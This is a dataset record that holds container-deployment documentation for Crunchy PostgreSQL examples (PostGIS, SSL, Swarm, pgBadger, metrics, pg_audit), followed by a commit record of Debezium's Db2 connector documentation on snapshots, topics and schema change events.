postgres-gis -U testuser userdb -c \"SELECT postgis_full_version();\"\n....\n\nYou should expect to see output similar to:\n\n....\npostgis_full_version\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n POSTGIS=\"2.4.2 r16113\" PGSQL=\"100\" GEOS=\"3.5.0-CAPI-1.9.0 r4084\" PROJ=\"Rel. 
4.8.0, 6 March 2012\" GDAL=\"GDAL 1.11.4, released 2016\/01\/25\" LIBXML=\"2.9.1\" LIBJSON=\"0.11\" TOPOLOGY RASTER\n(1 row)\n....\n\nAs an exercise for invoking some of the basic PostGIS functionality for validation, try defining a 2D geometry point while giving inputs of\nlongitude and latitude through this command.\n\n....\npsql -h postgres-gis -U testuser userdb -c \"select ST_MakePoint(28.385200,-81.563900);\"\n....\n\nYou should expect to see output similar to:\n\n....\n st_makepoint\n--------------------------------------------\n 0101000000516B9A779C623C40B98D06F0166454C0\n(1 row)\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/postgres-gis\n.\/run.sh\n....\n\nEnter the following command to connect to the postgres-gis container that is\nmapped to your local port 12000:\n....\npsql -h localhost -U testuser -p 12000 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/postgres-gis\n.\/run.sh\n....\n\n=== Custom Configuration\n\nYou can use your own version of the SQL file `setup.sql` to customize\nthe initialization of database data and objects when the container and\ndatabase are created.\n\nThis works by placing a file named `setup.sql` within the `\/pgconf` mounted volume\ndirectory. Portions of the `setup.sql` file are required for the container\nto work; please see comments within the sample `setup.sql` file.\n\nIf you mount a `\/pgconf` volume, crunchy-postgres will look at that directory\nfor `postgresql.conf`, `pg_hba.conf`, `pg_ident.conf`, SSL server\/ca certificates and `setup.sql`.\nIf it finds one of them it will use that file instead of the default files.\n\n==== Docker\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/custom-config\n.\/run.sh\n....\n\n=== SSL Authentication\n\nThis example shows how you can configure PostgreSQL to use SSL for\nclient authentication.\n\nThe example requires SSL certificates and keys to be created. Included in\nthe examples directory is a script to create self-signed certificates (server\nand client) for the example: `$CCPROOT\/examples\/ssl-creator.sh`.\n\nThe example creates a client certificate for the user `testuser`. 
Furthermore,\nthe server certificate is created for the server name `custom-config-ssl`.\n\nThis example can be run as follows for the Docker environment:\n....\ncd $CCPROOT\/examples\/docker\/custom-config-ssl\n.\/run.sh\n....\n\nAnd the example can be run in the following directory for the Kubernetes and OpenShift environments:\n....\ncd $CCPROOT\/examples\/kube\/custom-config-ssl\n.\/run.sh\n....\n\nA required step to make this example work is to define\nin your `\/etc\/hosts` file an entry that maps `custom-config-ssl`\nto the service IP address for the container.\n\nFor instance, if your service has an address as follows:\n....\n${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\ncustom-config-ssl 172.30.211.108 <none> 5432\/TCP\n....\n\nThen your `\/etc\/hosts` file needs an entry like this:\n....\n172.30.211.108 custom-config-ssl\n....\n\nFor production Kubernetes and OpenShift installations, it will likely be preferred for DNS\nnames to resolve to the PostgreSQL service name and to generate\nserver certificates using the DNS names instead of the example\nname `custom-config-ssl`.\n\nIf the client needs to confirm the identity of the server, `verify-full` can be\nspecified for `sslmode` in the connection string. This checks that the host name the\nclient connects to matches the name in the server certificate. Additionally, the proper connection parameters\nmust be specified in the connection string for the certificate information required to\ntrust and verify the identity of the server (`sslrootcert` and `sslcrl`), and to\nauthenticate the client using a certificate (`sslcert` and `sslkey`):\n\n....\npsql \"postgresql:\/\/testuser@custom-config-ssl:5432\/userdb?\\\nsslmode=verify-full&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nTo connect via IP, `sslmode` can be changed to `require`. This will verify the server\nby checking the certificate chain up to the trusted certificate authority, but will not\nverify that the hostname matches the certificate, as occurs with `verify-full`. The same\nconnection parameters as above can then be provided for the client and server certificate\ninformation.\n\n....\npsql \"postgresql:\/\/testuser@IP_OF_PGSQL:5432\/userdb?\\\nsslmode=require&\\\nsslrootcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crt&\\\nsslcrl=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/ca.crl&\\\nsslcert=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.crt&\\\nsslkey=$CCPROOT\/examples\/kube\/custom-config-ssl\/certs\/client.key\"\n....\n\nYou should see a connection that looks like the following:\n....\npsql (10.5)\nSSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)\nType \"help\" for help.\n\nuserdb=>\n....\n\n=== Docker Swarm\n\nThis example shows how to run a primary and replica database\ncontainer on a Docker Swarm (v.1.12) cluster.\n\nFirst, set up a cluster. 
The Kubernetes libvirt coreos cluster\nexample works well; see link:http:\/\/kubernetes.io\/docs\/getting-started-guides\/libvirt-coreos\/[coreos-libvirt-cluster.]\n\nNext, on each node, create the Swarm using these\nlink:https:\/\/docs.docker.com\/engine\/swarm\/swarm-tutorial\/create-swarm\/[Swarm Install instructions.]\n\nRun this command on the manager node:\n....\ndocker swarm init --advertise-addr 192.168.10.1\n....\n\nThen run this command on each of the worker nodes:\n....\n docker swarm join \\\n --token SWMTKN-1-65cn5wa1qv76l8l45uvlsbprogyhlprjpn27p1qxjwqmncn37o-015egopg4jhtbmlu04faon82u \\\n 192.168.10.1:2377\n....\n\nBefore creating Swarm services, it is necessary\nto define an overlay network to be used by the services you will\ncreate. This can be done as follows:\n....\ndocker network create --driver overlay crunchynet\n....\n\nWe want to have the primary database always placed on\na specific node. This is accomplished using node constraints\nas follows:\n....\ndocker node inspect kubernetes-node-1 | grep ID\ndocker node update --label-add type=primary 18yrb7m650umx738rtevojpqy\n....\n\nIn the above example, the `kubernetes-node-1` node with ID\n`18yrb7m650umx738rtevojpqy` has a user-defined label of `type=primary` added to it.\nThe primary service specifies a constraint of `node.labels.type == primary` when created; this\ntells Swarm to place the service on that specific node. The replica specifies\na constraint of `node.labels.type != primary` to have the replica\nalways placed on a node that is not hosting the primary service.\n\n==== Docker\n\nAfter you set up the Swarm cluster, you can then run this example as follows on the *Swarm Manager Node*:\n....\ncd $CCPROOT\/examples\/docker\/swarm-service\n.\/run.sh\n....\n\nYou can then find the nodes that are running the primary and replica containers\nby:\n....\ndocker service ps primary\ndocker service ps replica\n....\n\nYou can also scale up the number of *replica* containers:\n....\ndocker service scale replica=2\ndocker service ls\n....\n\nVerify you have two replicas within PostgreSQL by viewing the `pg_stat_replication` table.\nThe password is *password* by default when logged into the `kubernetes-node-1` host:\n....\ndocker exec -it $(docker ps -q) psql -U postgres -c 'table pg_stat_replication' postgres\n....\n\nYou should see a row for each replica along with its replication status.\n\n== Failover\n\n=== Watch\n\nCrunchy Watch is an application wrapped in a container that watches a PostgreSQL\nprimary database and waits for a failure to occur, at which point a failover is\nperformed to promote a replica.\n\nThe crunchy-watch container, while originally part of the Container Suite, has been\nsplit out into its own project. 
More information on the Watch container and its\ncapabilities can be found in the new project repository located at\nhttps:\/\/github.com\/CrunchyData\/crunchy-watch.\n\n== Metrics and Performance\n\n=== pgBadger\n\npgBadger is a PostgreSQL tool that reads the log files from a specified database\nin order to produce an HTML report that shows various PostgreSQL statistics and graphs.\nThis example runs the pgbadger HTTP server against a crunchy-postgres container and\nillustrates how to view the generated reports.\n\nThe port utilized for this tool is port 14000 for Docker environments and port 10000\nfor Kubernetes and OpenShift environments.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container runs an HTTP server and provides a simple URL\nyou can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/127.0.0.1:14000\/api\/badgergenerate\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgbadger\n.\/run.sh\n....\n\nAfter execution, the container runs an HTTP server and provides a simple URL\nyou can browse to view the report. As you run queries against\nthe database, you can invoke this URL to generate updated reports:\n....\ncurl -L http:\/\/pgbadger:10000\/api\/badgergenerate\n....\n\nYou can view the database container logs using these commands:\n....\n${CCP_CLI} logs pgbadger -c pgbadger\n${CCP_CLI} logs pgbadger -c postgres\n....\n\n=== Metrics Collection\n\nYou can collect various PostgreSQL metrics from your database\ncontainer by running a crunchy-collect container that points\nto your database container.\n\nThis example starts up the following containers:\n\n * Collect (crunchy-collect)\n * Grafana (crunchy-grafana)\n * PostgreSQL (crunchy-postgres)\n * Prometheus (crunchy-prometheus)\n\nEvery 5 seconds by default, Prometheus will scrape the Collect container\nfor metrics. These metrics will then be visualized by Grafana.\n\nBy default, Prometheus detects which environment it's running on (Docker, Kubernetes, or OpenShift Container Platform)\nand applies a default configuration. If this container is running on Kubernetes or OpenShift Container Platform,\nit will use the Kubernetes API to discover pods with the label `\"crunchy-collect\": \"true\"`.\n\nThe collect container *must* have this label to be discovered in these environments.\nAdditionally, the collect container uses a special PostgreSQL role `ccp_monitoring`.\nThis user is created by setting the `PGMONITOR_PASSWORD` environment variable on the\nPostgreSQL container.\n\nDiscovering pods requires a service account bound to a cluster role.
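\n\nAs a rough sketch of what this involves, equivalent objects could be created manually with commands along the following lines; the object names here are illustrative only, and the example ships its own definitions:\n....\n${CCP_CLI} create serviceaccount metrics-sa\n${CCP_CLI} create clusterrole pod-reader --verb=get,list,watch --resource=pods\n${CCP_CLI} create clusterrolebinding metrics-pod-reader --clusterrole=pod-reader --serviceaccount=default:metrics-sa\n....\n\n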
See the\nlink:https:\/\/github.com\/crunchydata\/crunchy-containers\/blob\/master\/examples\/kube\/metrics\/metrics.json[Kubernetes and OpenShift]\nmetrics JSON file for more details.\n\nFor Docker environments, the collect hostname must be specified as an environment\nvariable.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo start this set of containers, run the following:\n....\ncd $CCPROOT\/examples\/docker\/metrics\n.\/run.sh\n....\n\nYou will be able to access the Grafana and Prometheus services from the following\nweb addresses:\n\n * Grafana (http:\/\/0.0.0.0:3000)\n * Prometheus (http:\/\/0.0.0.0:9090)\n\nThe crunchy-postgres container is accessible on port *5432*.\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/metrics\n.\/run.sh\n....\n\nIt's required to use `port-forward` to access the Grafana and Prometheus dashboards. To start the\nport-forwards, run the following commands:\n\n....\n${CCP_CLI} port-forward metrics 3000:3000\n${CCP_CLI} port-forward metrics 9090:9090\n....\n\n * The Grafana dashboard can then be accessed at `http:\/\/127.0.0.1:3000`\n * The Prometheus dashboard can then be accessed at `http:\/\/127.0.0.1:9090`\n\nYou can view the container logs using these commands:\n....\n${CCP_CLI} logs -c grafana metrics\n${CCP_CLI} logs -c prometheus metrics\n${CCP_CLI} logs -c collect primary-metrics\n${CCP_CLI} logs -c postgres primary-metrics\n${CCP_CLI} logs -c collect replica-metrics\n${CCP_CLI} logs -c postgres replica-metrics\n....\n\n=== pg_audit\n\nThis example demonstrates how to enable pg_audit output.\nAs of release 1.3, pg_audit is included in the crunchy-postgres\ncontainer and is added to the PostgreSQL shared library list in\n`postgresql.conf`.\n\nGiven the numerous ways pg_audit can be configured, the exact\npg_audit configuration is left to the user to define. pg_audit\nallows you to configure auditing rules either in `postgresql.conf`\nor within your SQL script.\n\nFor this test, we place pg_audit statements within a SQL script\nand verify that auditing is enabled and working. If you choose\nto configure pg_audit via a `postgresql.conf` file, then you will\nneed to define your own custom file and mount it to override the\ndefault `postgresql.conf` file.\n\n==== Docker\n\nRun the following to create a database container:\n....\ncd $CCPROOT\/examples\/docker\/pgaudit\n.\/run.sh\n....\n\nThis starts an instance of the pg_audit container (running crunchy-postgres)\non port 12005 on localhost. The test script is then automatically executed.\n\nThis test executes a SQL file that contains pg_audit configuration\nstatements as well as some basic SQL commands. These\nSQL commands will cause pg_audit to create log messages in\nthe `pg_log` log file created by the database container.\n\n==== Kubernetes and OpenShift\n\nRun the following:\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/run.sh\n....\n\nThis script will create a PostgreSQL pod with the pgAudit extension configured and ready\nto use.\n\nOnce the pod is deployed successfully, run the following command to test the extension:\n\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/test-pgaudit.sh\n....\n\nThis example has been configured to log directly to stdout of the pod.
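\n\nFor reference, the kind of statements the test script issues look roughly like the following. This is an illustrative sketch only; the host name and SQL are assumptions rather than the exact contents of the example's script. It sets `pgaudit.log` for the session and then issues DDL statements so that audit records are emitted to the log:\n....\npsql -h pgaudit -U postgres postgres -c \"set pgaudit.log = 'ddl'; create table audit_test (id int); drop table audit_test;\"\n....\n\n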
To view the PostgreSQL logs\nrun the following:\n\n....\n$CCP_CLI logs pgaudit\n....\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c33e46cffad2ce6b689146bee12bd997648ae28c","subject":"DBZ-2814 Remove Db2 Tech prev\/incubating statements for promotion to GA.","message":"DBZ-2814 Remove Db2 Tech prev\/incubating statements for promotion to GA.\n","repos":"jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-db2\"]\n= {prodname} connector for Db2\n\n:context: db2\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into \"capture mode\". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.\n\nA table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.\n\nThe first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.\n\nWhen the snapshot is complete the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. Applications and services consume change events from these topics.\n\nThe connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 zOS. To use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product. However, IIDR does not need to be installed.\n\nThe Db2 connector has been tested with Db2\/Linux {linux-version}. 
It is expected that the connector would also work on Windows, AIX and zOS.\n\nifdef::product[]\nInformation and procedures for using a {prodname} Db2 connector is organized as follows:\n\n* xref:overview-of-debezium-db2-connector[]\n* xref:how-debezium-db2-connectors-work[]\n* xref:descriptions-of-debezium-db2-connector-data-change-events[]\n* xref:how-debezium-db2-connectors-map-data-types[]\n* xref:setting-up-db2-to-run-a-debezium-connector[]\n* xref:deploying-debezium-db2-connectors[]\n* xref:monitoring-debezium-db2-connector-performance[]\n* xref:managing-debezium-db2-connectors[]\n* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Db2 connector\n\/\/ ModuleID: overview-of-debezium-db2-connector\n[[db2-overview]]\n== Overview\n\nThe {prodname} Db2 connector is based on the link:https:\/\/www.ibm.com\/support\/pages\/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture\/Apply agents]\nthat enable SQL Replication in Db2. A capture agent:\n\n* Generates change-data tables for tables that are in capture mode.\n* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.\n\nThe {prodname} connector uses a SQL interface to query change-data tables for change events.\n\nThe database administrator must put the tables for which you want to capture changes into capture mode. For convenience and for automating testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:\n\n* Start, stop, and reinitialize the ASN agent\n* Put tables into capture mode\n* Create the replication (ASN) schemas and change-data tables\n* Remove tables from capture mode\n\nAlternatively, you can use Db2 control commands to accomplish these tasks.\n\nAfter the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and can react to each row-level change event.\n\nTypically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.\n\n{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log. 
If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-db2-connectors-work\n\/\/ Title: How {prodname} Db2 connectors work\n[[how-the-db2-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-db2-connectors-perform-database-snapshots[]\n* xref:how-debezium-db2-connectors-read-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]\n* xref:about-the-debezium-db2-connector-schema-change-topic[]\n* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-db2-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} Db2 connectors perform database snapshots\n[[db2-snapshots]]\n=== Snapshots\n\nDb2's replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.\n\nBy default, when a Db2 connector performs a snapshot, it does the following:\n\n. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list`, let you specify which tables should be in capture mode.\n. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.\n. Reads the highest (most recent) LSN position in the server's transaction log.\n. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.\n. Optionally, releases the locks obtained in step 2. Typically, these locks are held for only a short time.\n. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:\n.. Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete, and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. 
Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS` that are in the `MYSCHEMA` schema. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently-named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. 
The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. 
The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|5\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|6\n|`table`\n|Represents table metadata after the applied change.\n\n|7\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|8\n|`columns`\n|Metadata for each column in the changed table.\n\n|===\n\nIn messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"TESTDB\"\n }\n}\n----\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} Db2 connector-generated events that represent transaction boundaries\n[[db2-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nThe connector emits transaction events to the `_database.server.name_.transaction` topic.\n\n.Data change event enrichment\n\nWhen transaction metadata is enabled the connector enriches the change event `Envelope` with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Db2 connector data change events\n[[db2-events]]\n== Data change events\n\nThe {prodname} Db2 connector 
generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": 